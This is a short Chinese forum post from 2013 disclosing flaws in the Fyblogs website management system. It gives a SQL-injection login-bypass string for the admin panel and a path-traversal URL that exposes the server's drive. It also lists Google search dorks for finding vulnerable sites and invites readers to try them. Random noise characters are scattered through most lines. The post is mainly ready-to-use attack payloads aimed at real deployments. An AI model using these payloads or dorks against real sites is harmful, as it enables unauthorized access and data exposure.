漏洞类型: 未授权访问/权限绕过: i2 [( s, r/ ~/ a
, g' [6 E6 U3 b4 Z' @简要描述:1 p4 b& L: _: Y& B: N
2 i7 [2 B- f. s1 r8 g1 ~2 v6 g
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
) P& z9 a# R3 H; g7 k
7 w) M& r% ~$ L" p" R& x! E详细说明:: F% U$ ^+ \% M! j6 v' h P
/ s+ a i( u, T" K% {8 f0 s8 h
后台万能密码 'or'='or'
: @/ O2 W0 K) c! k4 {3 T5 P3 j; K后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!$ r. d4 {; ]; X! ~+ n5 {6 {
admin/uploadfile.asp?currentFolder=/upfiles/../
& v' y X5 [2 z) Z* B5 [
! D0 f, `- L/ }( [( X* e漏洞证明:
4 _- Q/ g( n- Q' o( t
$ b/ I& g: x; W# a& h0 y4 {( |- }谷歌:inurl:type.asp?id=1 新闻中心
/ s+ T8 C* G, J或者 :inurl:download_ok.asp?
- `1 t# g3 ?; i( P0 z2 K0 D: F0 M. w7 G; {
可以测试- o$ e- j2 N* p8 d
1 _! C! d0 N4 ~& G6 s/ R
* [5 b3 ~$ V& z/ I/ R _9 a
|
发表于 2013-3-7 13:07:46
收藏
支持
反对